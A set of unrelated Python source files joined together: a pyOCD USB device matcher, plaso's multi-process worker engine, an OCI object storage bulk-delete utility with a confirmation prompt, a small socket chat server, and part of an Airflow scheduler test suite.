usb.util.release_interface(self.dev, self.intf_number)
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.thread = None
class HasCmsisDapv2Interface(object):
"""! @brief CMSIS-DAPv2 match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""! @brief Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""! @brief Return True if this is a CMSIS-DAPv2 device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
def match_cmsis_dap_interface_name(desc):
interface_name = usb.util.get_string(desc.device, desc.iInterface)
return (interface_name is not None) and ("CMSIS-DAP" in interface_name)
config = dev.get_active_configuration()
cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=match_cmsis_dap_interface_name)
except usb.core.USBError as error:
# Produce a more helpful error message if we get a permissions error on Linux.
if error.errno == errno.EACCES and platform.system() == "Linux":
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
LOG.warning(msg)
else:
LOG.debug(msg)
elif error.errno == errno.ENOENT:
# This error happens on devices that don't have an interface description string.
pass
else:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s",
dev.idVendor, dev.idProduct, error)
return False
except (IndexError, NotImplementedError) as error:
LOG.debug("Error accessing USB device (VID=%04x PID=%04x): %s", dev.idVendor, dev.idProduct, error)
return False
if cmsis_dap_interface is None:
return False
# Check the class and subclass are vendor-specific.
if (cmsis_dap_interface.bInterfaceClass != 0xff) or (cmsis_dap_interface.bInterfaceSubClass != 0):
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
engine.py
|
# -*- coding: utf-8 -*-
"""The multi-process processing engine."""
import abc
import ctypes
import os
import signal
import sys
import threading
import time
from plaso.engine import engine
from plaso.engine import process_info
from plaso.lib import definitions
from plaso.multi_process import logger
from plaso.multi_process import plaso_xmlrpc
class MultiProcessEngine(engine.BaseEngine):
"""Multi-process engine base.
This class contains functionality to:
* monitor and manage worker processes;
* retrieve a process status information via RPC;
* manage the status update thread.
"""
# Note that on average Windows seems to require a longer wait.
_RPC_SERVER_TIMEOUT = 8.0
_MAXIMUM_RPC_ERRORS = 10
# Maximum number of attempts to try to start a replacement worker process.
_MAXIMUM_REPLACEMENT_RETRIES = 3
# Number of seconds to wait between attempts to start a replacement worker
# process
_REPLACEMENT_WORKER_RETRY_DELAY = 1
_PROCESS_JOIN_TIMEOUT = 5.0
_ZEROMQ_NO_WORKER_REQUEST_TIME_SECONDS = 300
def __init__(self):
"""Initializes a multi-process engine."""
super(MultiProcessEngine, self).__init__()
self._debug_output = False
self._name = 'Main'
self._log_filename = None
self._pid = os.getpid()
self._process_information = process_info.ProcessInfo(self._pid)
self._process_information_per_pid = {}
self._processes_per_pid = {}
self._quiet_mode = False
self._rpc_clients_per_pid = {}
self._rpc_errors_per_pid = {}
self._status_update_active = False
self._status_update_callback = None
self._status_update_thread = None
self._storage_writer = None
self._worker_memory_limit = definitions.DEFAULT_WORKER_MEMORY_LIMIT
def _AbortJoin(self, timeout=None):
"""Aborts all registered processes by joining with the parent process.
Args:
timeout (int): number of seconds to wait for processes to join, where
None represents no timeout.
"""
for pid, process in self._processes_per_pid.items():
logger.debug('Waiting for process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.join(timeout=timeout)
if not process.is_alive():
logger.debug('Process {0:s} (PID: {1:d}) stopped.'.format(
process.name, pid))
def _AbortKill(self):
"""Aborts all registered processes by sending a SIGKILL or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Killing process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
self._KillProcess(pid)
def _AbortTerminate(self):
"""Aborts all registered processes by sending a SIGTERM or equivalent."""
for pid, process in self._processes_per_pid.items():
if not process.is_alive():
continue
logger.warning('Terminating process: {0:s} (PID: {1:d}).'.format(
process.name, pid))
process.terminate()
def _CheckStatusWorkerProcess(self, pid):
"""Checks the status of a worker process.
If a worker process is not responding the process is terminated and
a replacement process is started.
Args:
pid (int): process ID (PID) of a registered worker process.
Raises:
KeyError: if the process is not registered with the engine.
"""
# TODO: Refactor this method, simplify and separate concerns (monitoring
# vs management).
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
process_status = self._QueryProcessStatus(process)
if process_status is None:
process_is_alive = False
else:
process_is_alive = True
process_information = self._process_information_per_pid[pid]
used_memory = process_information.GetUsedMemory() or 0
if self._worker_memory_limit and used_memory > self._worker_memory_limit:
logger.warning((
'Process: {0:s} (PID: {1:d}) killed because it exceeded the '
'memory limit: {2:d}.').format(
process.name, pid, self._worker_memory_limit))
self._KillProcess(pid)
if isinstance(process_status, dict):
self._rpc_errors_per_pid[pid] = 0
status_indicator = process_status.get('processing_status', None)
else:
rpc_errors = self._rpc_errors_per_pid.get(pid, 0) + 1
self._rpc_errors_per_pid[pid] = rpc_errors
if rpc_errors > self._MAXIMUM_RPC_ERRORS:
process_is_alive = False
if process_is_alive:
rpc_port = process.rpc_port.value
logger.warning((
'Unable to retrieve process: {0:s} (PID: {1:d}) status via '
'RPC socket: http://localhost:{2:d}').format(
process.name, pid, rpc_port))
processing_status_string = 'RPC error'
status_indicator = definitions.STATUS_INDICATOR_RUNNING
else:
processing_status_string = 'killed'
status_indicator = definitions.STATUS_INDICATOR_KILLED
process_status = {
'processing_status': processing_status_string}
self._UpdateProcessingStatus(pid, process_status, used_memory)
# _UpdateProcessingStatus can also change the status of the worker,
# So refresh the status if applicable.
for worker_status in self._processing_status.workers_status:
if worker_status.pid == pid:
status_indicator = worker_status.status
break
if status_indicator in definitions.ERROR_STATUS_INDICATORS:
logger.error((
'Process {0:s} (PID: {1:d}) is not functioning correctly. '
'Status code: {2!s}.').format(process.name, pid, status_indicator))
self._TerminateProcessByPid(pid)
replacement_process = None
for replacement_process_attempt in range(
self._MAXIMUM_REPLACEMENT_RETRIES):
logger.info((
'Attempt: {0:d} to start replacement worker process for '
'{1:s}').format(replacement_process_attempt + 1, process.name))
replacement_process = self._StartWorkerProcess(process.name)
if replacement_process:
break
time.sleep(self._REPLACEMENT_WORKER_RETRY_DELAY)
if not replacement_process:
logger.error(
'Unable to create replacement worker process for: {0:s}'.format(
process.name))
def _KillProcess(self, pid):
"""Issues a SIGKILL or equivalent to the process.
Args:
pid (int): process identifier (PID).
"""
if sys.platform.startswith('win'):
process_terminate = 1
handle = ctypes.windll.kernel32.OpenProcess(
process_terminate, False, pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
try:
os.kill(pid, signal.SIGKILL)
except OSError as exception:
logger.error('Unable to kill process {0:d} with error: {1!s}'.format(
pid, exception))
def _QueryProcessStatus(self, process):
"""Queries a process to determine its status.
Args:
process (MultiProcessBaseProcess): process to query for its status.
Returns:
dict[str, str]: status values received from the worker process.
"""
process_is_alive = process.is_alive()
if process_is_alive:
rpc_client = self._rpc_clients_per_pid.get(process.pid, None)
process_status = rpc_client.CallFunction()
else:
process_status = None
return process_status
def _RaiseIfNotMonitored(self, pid):
"""Raises if the process is not monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not monitored by the engine.
"""
if pid not in self._process_information_per_pid:
raise KeyError(
'Process (PID: {0:d}) not monitored by engine.'.format(pid))
def _RaiseIfNotRegistered(self, pid):
"""Raises if the process is not registered with the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with the engine.
"""
if pid not in self._processes_per_pid:
raise KeyError(
'Process (PID: {0:d}) not registered with engine'.format(pid))
def _RegisterProcess(self, process):
"""Registers a process with the engine.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is already registered with the engine.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
if process.pid in self._processes_per_pid:
raise KeyError(
'Already managing process: {0!s} (PID: {1:d})'.format(
process.name, process.pid))
self._processes_per_pid[process.pid] = process
# pylint: disable=redundant-returns-doc
@abc.abstractmethod
def _StartWorkerProcess(self, process_name):
"""Creates, starts, monitors and registers a worker process.
Args:
process_name (str): process name.
Returns:
MultiProcessWorkerProcess: extraction worker process.
"""
def _StartMonitoringProcess(self, process):
"""Starts monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
IOError: if the RPC client cannot connect to the server.
KeyError: if the process is not registered with the engine or
if the process is already being monitored.
OSError: if the RPC client cannot connect to the server.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
if pid in self._process_information_per_pid:
raise KeyError(
'Already monitoring process (PID: {0:d}).'.format(pid))
if pid in self._rpc_clients_per_pid:
raise KeyError(
'RPC client (PID: {0:d}) already exists'.format(pid))
rpc_client = plaso_xmlrpc.XMLProcessStatusRPCClient()
# Make sure that a worker process has started its RPC server.
# The RPC port will be 0 if no server is available.
rpc_port = process.rpc_port.value
time_waited_for_process = 0.0
while not rpc_port:
time.sleep(0.1)
rpc_port = process.rpc_port.value
time_waited_for_process += 0.1
if time_waited_for_process >= self._RPC_SERVER_TIMEOUT:
raise IOError(
'RPC client unable to determine server (PID: {0:d}) port.'.format(
pid))
hostname = 'localhost'
if not rpc_client.Open(hostname, rpc_port):
raise IOError((
'RPC client unable to connect to server (PID: {0:d}) '
'http://{1:s}:{2:d}').format(pid, hostname, rpc_port))
self._rpc_clients_per_pid[pid] = rpc_client
self._process_information_per_pid[pid] = process_info.ProcessInfo(pid)
def _StartStatusUpdateThread(self):
"""Starts the status update thread."""
self._status_update_active = True
self._status_update_thread = threading.Thread(
name='Status update', target=self._StatusUpdateThreadMain)
self._status_update_thread.start()
def _StatusUpdateThreadMain(self):
"""Main function of the status update thread."""
while self._status_update_active:
self._UpdateStatus()
time.sleep(self._STATUS_UPDATE_INTERVAL)
def _StopMonitoringProcess(self, process):
"""Stops monitoring a process.
Args:
process (MultiProcessBaseProcess): process.
Raises:
KeyError: if the process is not monitored.
ValueError: if the process is missing.
"""
if process is None:
raise ValueError('Missing process.')
pid = process.pid
self._RaiseIfNotMonitored(pid)
del self._process_information_per_pid[pid]
rpc_client = self._rpc_clients_per_pid.get(pid, None)
if rpc_client:
rpc_client.Close()
del self._rpc_clients_per_pid[pid]
if pid in self._rpc_errors_per_pid:
del self._rpc_errors_per_pid[pid]
logger.debug('Stopped monitoring process: {0:s} (PID: {1:d})'.format(
process.name, pid))
def _StopMonitoringProcesses(self):
"""Stops monitoring all processes."""
# We need to make a copy of the list of pids since we are changing
# the dict in the loop.
for pid in list(self._process_information_per_pid.keys()):
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._StopMonitoringProcess(process)
def _StopStatusUpdateThread(self):
"""Stops the status update thread."""
if self._status_update_thread:
self._status_update_active = False
if self._status_update_thread.is_alive():
self._status_update_thread.join()
self._status_update_thread = None
# Update the status view one last time so we have the latest worker process
# status information.
self._UpdateStatus()
def _TerminateProcessByPid(self, pid):
"""Terminate a process that's monitored by the engine.
Args:
pid (int): process identifier (PID).
Raises:
KeyError: if the process is not registered with and monitored by the
engine.
"""
self._RaiseIfNotRegistered(pid)
process = self._processes_per_pid[pid]
self._TerminateProcess(process)
self._StopMonitoringProcess(process)
def _TerminateProcess(self, process):
"""Terminate a process.
Args:
process (MultiProcessBaseProcess): process to terminate.
"""
pid = process.pid
logger.warning('Terminating process: (PID: {0:d}).'.format(pid))
process.terminate()
# Wait for the process to exit.
process.join(timeout=self._PROCESS_JOIN_TIMEOUT)
if process.is_alive():
logger.warning('Killing process: (PID: {0:d}).'.format(pid))
self._KillProcess(pid)
@abc.abstractmethod
def _UpdateProcessingStatus(self, pid, process_status, used_memory):
"""Updates the processing status.
Args:
pid (int): process identifier (PID) of the worker process.
process_status (dict[str, object]): status values received from
the worker process.
used_memory (int): size of used memory in bytes.
Raises:
KeyError: if the process is not registered with the engine.
"""
@abc.abstractmethod
def _UpdateStatus(self):
"""Updates the status."""
|
object_storage_bulk_delete.py
|
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
##########################################################################
# object_storage_bulk_delete.py
#
# @author: Adi Zohar
#
# Supports Python 3
##########################################################################
# Info:
# Bulk delete with parallel threads
#
##########################################################################
# Application Command line parameters
#
# -c config - Config file section to use (tenancy profile)
# -t profile - Profile in config file, DEFAULT as default
# -p proxy - Set Proxy (i.e. www-proxy-server.com:80)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -sb source_bucket
# -sp source_prefix
# -sr source_region
##########################################################################
import threading
import time
import queue
import oci
import argparse
import datetime
import sys
import click
import os
##########################################################################
# Pre Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-p', default="", dest='proxy', help='Set Proxy (i.e. www-proxy-server.com:80) ')
parser.add_argument('-ip', action='store_true', default=False, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-c', default="", dest='config_file', help="Config File (default=~/.oci/config)")
parser.add_argument('-sb', default="", dest='source_bucket', help='Source Bucket Name')
parser.add_argument('-sp', default="", dest='source_prefix', help='Source Prefix Include')
parser.add_argument('-se', default="", dest='source_prefix_exclude', help='Source Prefix Exclude')
parser.add_argument('-exclude_dirs', action='store_true', default=False, dest='source_exclude_dirs', help='Exclude Directories')
parser.add_argument('-sr', default="", dest='source_region', help='Source Region')
cmd = parser.parse_args()
if len(sys.argv) < 1:
parser.print_help()
raise SystemExit
if not cmd.source_bucket:
print("Source bucket parameter is required !!!\n")
parser.print_help()
raise SystemExit
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
# Parameters
worker_count = 40
status_interval = 60
base_retry_timeout = 2
max_retry_timeout = 16**2
# global queue
q = queue.Queue()
# Global Variables
object_storage_client = None
source_namespace = ""
source_bucket = cmd.source_bucket
source_prefix = cmd.source_prefix
source_prefix_exclude = cmd.source_prefix_exclude
source_region = cmd.source_region
source_exclude_dirs = cmd.source_exclude_dirs
# Update Variables based on the parameters
config_file = (cmd.config_file if cmd.config_file else oci.config.DEFAULT_LOCATION)
config_profile = (cmd.config_profile if cmd.config_profile else oci.config.DEFAULT_PROFILE)
##########################################################################
# Create signer for Authentication
# Input - config_file, config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_file, config_profile, is_instance_principals, is_delegation_token):
# if instance principals authentications
if is_instance_principals:
try:
signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
config = {'region': signer.region, 'tenancy': signer.tenancy_id}
return config, signer
except Exception:
print_header("Error obtaining instance principals certificate, aborting")
raise SystemExit
# -----------------------------
# Delegation Token
# -----------------------------
elif is_delegation_token:
try:
# check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them
env_config_file = os.environ.get('OCI_CONFIG_FILE')
env_config_section = os.environ.get('OCI_CONFIG_PROFILE')
# check if file exist
if env_config_file is None or env_config_section is None:
print("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
print("")
raise SystemExit
config = oci.config.from_file(env_config_file, env_config_section)
delegation_token_location = config["delegation_token_file"]
with open(delegation_token_location, 'r') as delegation_token_file:
delegation_token = delegation_token_file.read().strip()
# get signer from delegation token
signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)
return config, signer
except KeyError:
print("* Key Error obtaining delegation_token_file")
raise SystemExit
except Exception:
raise
# -----------------------------
# config file authentication
# -----------------------------
else:
config = oci.config.from_file(
(config_file if config_file else oci.config.DEFAULT_LOCATION),
(config_profile if config_profile else oci.config.DEFAULT_PROFILE)
)
signer = oci.signer.Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=oci.config.get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
return config, signer
##############################################################################
# get time
##############################################################################
def get_time(full=False):
if full:
return str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
return str(datetime.datetime.now().strftime("%H:%M:%S"))
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
chars = int(90)
print("")
print('#' * chars)
print("#" + name.center(chars - 2, " ") + "#")
print('#' * chars)
##########################################################################
# Print Info
##########################################################################
def print_command_info():
print_header("Running Object Storage Bulk Delete")
print("Written by Adi Zohar, July 2020")
print("Starts at : " + get_time(full=True))
print("Command Line : " + ' '.join(x for x in sys.argv[1:]))
print("Source Namespace : " + source_namespace)
print("Source Bucket : " + source_bucket)
print("Source Prefix Include : " + source_prefix)
print("Source Prefix Exclude : " + source_prefix_exclude)
print("Source Region : " + source_region)
if source_exclude_dirs:
print("Source Exclude Dirs : True")
##############################################################################
# Worker
##############################################################################
def worker():
while True:
object_ = q.get()
interval_exp = base_retry_timeout
while True:
response = None
try:
response = object_storage_client.delete_object(source_namespace, source_bucket, object_)
break
except Exception as e:
if e.status == 400:
break
if interval_exp > max_retry_timeout:
print(" ERROR: Failed to request delete of %s" % (object_))
raise
if response:
print(" Received %s from API for object %s, will wait %s seconds before retrying." % (response.status, object_, interval_exp))
else:
print(" Received error from API for object %s, will wait %s seconds before retrying." % (object_, interval_exp))
time.sleep(interval_exp)
interval_exp **= 2
continue
q.task_done()
##############################################################################
# Add object to Q
##############################################################################
def add_objects_to_queue(ns, source_bucket):
global q
count = 0
next_starts_with = None
while True:
response = object_storage_client.list_objects(ns, source_bucket, start=next_starts_with, prefix=source_prefix, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
next_starts_with = response.data.next_start_with
for object_ in response.data.objects:
if source_prefix_exclude and object_.name.startswith(source_prefix_exclude):
continue
if source_exclude_dirs and "/" in object_.name:
continue
q.put(object_.name)
count += 1
if count % 100000 == 0:
print(get_time() + " - Added " + str(count) + " files to queue...")
if not next_starts_with:
break
return count
##############################################################################
# connect to object storage
##############################################################################
def connect_to_object_storage():
global source_namespace
global object_storage_client
global source_region
# get signer
config, signer = create_signer(cmd.config_file, cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
# if region is specified
if source_region:
config['region'] = source_region
else:
source_region = config['region']
try:
# connect and fetch namespace
print("\nConnecting to Object Storage Service...")
object_storage_client = oci.object_storage.ObjectStorageClient(config, signer=signer)
if cmd.proxy:
object_storage_client.base_client.session.proxies = {'https': cmd.proxy}
# retrieve namespace from object storage
source_namespace = object_storage_client.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
print("Succeed.")
except Exception as e:
print("\nError connecting to Object Storage - " + str(e))
raise SystemExit
##############################################################################
# Main
##############################################################################
def main():
# connect to object storage
connect_to_object_storage()
# command info
print_command_info()
if not click.confirm('\nAre you sure you want to continue deleting ?'):
raise SystemExit
print_header("Start Processing")
print(get_time() + " - Creating %s workers." % (worker_count))
for i in range(worker_count):
w = threading.Thread(target=worker)
w.daemon = True
w.start()
print(get_time() + " - Getting list of objects from source source_bucket (%s). delete will start immediately." % (source_bucket))
count = add_objects_to_queue(source_namespace, source_bucket)
print(get_time() + " - Enqueued %s objects to be deleted" % (count))
while count > 0:
print(get_time() + " - Waiting %s seconds before checking status." % (status_interval))
time.sleep(status_interval)
if q.qsize() == 0:
print(get_time() + " - deletion of all objects has been requested.")
break
else:
print(get_time() + " - %s object deletes remaining to requested." % (q.qsize()))
q.join()
print_header("Completed")
print("Completed at : " + get_time(True))
##############################################################################
# Execute
##############################################################################
if __name__ == '__main__':
main()
|
server.py
|
#!/usr/bin/env python3
"""Server for multithreaded (asynchronous) chat application."""
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SERVER.accept()
print("%s:%s has connected." % client_address)
client.send(bytes("Greetings from the cave! Now type your name and press enter!", "utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client,)).start()
def handle_client(client): # Takes client socket as argument.
"""Handles a single client connection."""
name = client.recv(BUFSIZ).decode("utf8")
welcome = 'Welcome %s! If you ever want to quit, type {quit} to exit.' % name
client.send(bytes(welcome, "utf8"))
msg = "%s has joined the chat!" % name
broadcast(bytes(msg, "utf8"))
clients[client] = name
while True:
msg = client.recv(BUFSIZ)
if msg != bytes("{quit}", "utf8"):
broadcast(msg, name+": ")
else:
client.send(bytes("{quit}", "utf8"))
client.close()
del clients[client]
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
clients = {}
addresses = {}
HOST = ''
PORT = 33000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.bind(ADDR)
if __name__ == "__main__":
SERVER.listen(5)
print("Waiting for connection...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()\
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
